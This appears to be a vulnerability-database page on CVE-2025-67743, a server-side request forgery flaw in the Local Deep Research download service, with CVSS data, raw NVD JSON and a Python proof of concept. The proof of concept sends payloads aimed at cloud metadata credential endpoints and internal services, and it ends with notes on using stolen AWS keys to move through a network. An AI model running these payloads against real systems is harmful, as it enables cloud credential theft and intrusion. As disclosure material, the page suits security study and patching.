Security Vulnerability Report
中文
CVE-2025-67743 CVSS 6.3 MEDIUM

CVE-2025-67743

Published: 2025-12-23 01:15:43
Last Modified: 2025-12-29 16:08:52
Source: [email protected]

Description

Local Deep Research is an AI-powered research assistant for deep, iterative research. In versions from 1.3.0 to before 1.3.9, the download service (download_service.py) makes HTTP requests using raw requests.get() without utilizing the application's SSRF protection (safe_requests.py). This can allow attackers to access internal services and attempt to reach cloud provider metadata endpoints (AWS/GCP/Azure), as well as perform internal network reconnaissance, by submitting malicious URLs through the API, depending on the deployment and surrounding controls. This issue has been patched in version 1.3.9.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:learningcircuit:local_deep_research:*:*:*:*:*:*:*:* - VULNERABLE
Local Deep Research >= 1.3.0
Local Deep Research < 1.3.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67743 SSRF PoC # Target: Local Deep Research <= 1.3.8 # Attack: Exploit SSRF to access AWS EC2 metadata import requests import json # Target endpoint (adjust based on actual API) TARGET_URL = "http://target-server:8000/api/research/download" # Payload to exploit SSRF - Access AWS EC2 metadata service ssrf_payloads = [ "http://169.254.169.254/latest/meta-data/", "http://169.254.169.254/latest/meta-data/iam/security-credentials/", "http://169.254.169.254/latest/meta-data/instance-id", "http://169.254.169.254/latest/user-data/", "http://localhost:22/", "http://127.0.0.1:6379/", "http://10.0.0.1:8080/admin" ] def exploit_ssrf(target_url, payload): """ Send malicious URL to download service The vulnerable code uses requests.get() directly instead of safe_requests.get() with SSRF protection """ headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } # Malicious request payload data = { "url": payload, "task_id": "test_123" } try: response = requests.post(target_url, json=data, headers=headers, timeout=10) print(f"[*] Payload: {payload}") print(f"[*] Status: {response.status_code}") print(f"[*] Response: {response.text[:500]}") print("-" * 50) return response.text except Exception as e: print(f"[!] Error: {e}") return None if __name__ == "__main__": print("CVE-2025-67743 SSRF Exploitation Test") print("=" * 50) for payload in ssrf_payloads: result = exploit_ssrf(TARGET_URL, payload) # Check if sensitive data was exfiltrated print("\n[!] If credentials found, attacker can:") print(" 1. Use AWS keys for lateral movement") print(" 2. Access internal services") print(" 3. Escalate privileges in cloud environment")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67743", "sourceIdentifier": "[email protected]", "published": "2025-12-23T01:15:43.160", "lastModified": "2025-12-29T16:08:52.113", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Local Deep Research is an AI-powered research assistant for deep, iterative research. In versions from 1.3.0 to before 1.3.9, the download service (download_service.py) makes HTTP requests using raw requests.get() without utilizing the application's SSRF protection (safe_requests.py). This can allow attackers to access internal services and attempt to reach cloud provider metadata endpoints (AWS/GCP/Azure), as well as perform internal network reconnaissance, by submitting malicious URLs through the API, depending on the deployment and surrounding controls. This issue has been patched in version 1.3.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:learningcircuit:local_deep_research:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.3.0", "versionEndExcluding": "1.3.9", "matchCriteriaId": "3231336E-4CE1-4DCA-BFC0-936899177351"}]}]}], "references": [{"url": "https://github.com/LearningCircuit/local-deep-research/commit/b79089ff30c5d9ae77e6b903c408e1c26ad5c055", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/LearningCircuit/local-deep-research/security/advisories/GHSA-9c54-gxh7-ppjc", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/LearningCircuit/local-deep-research/security/advisories/GHSA-9c54-gxh7-ppjc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.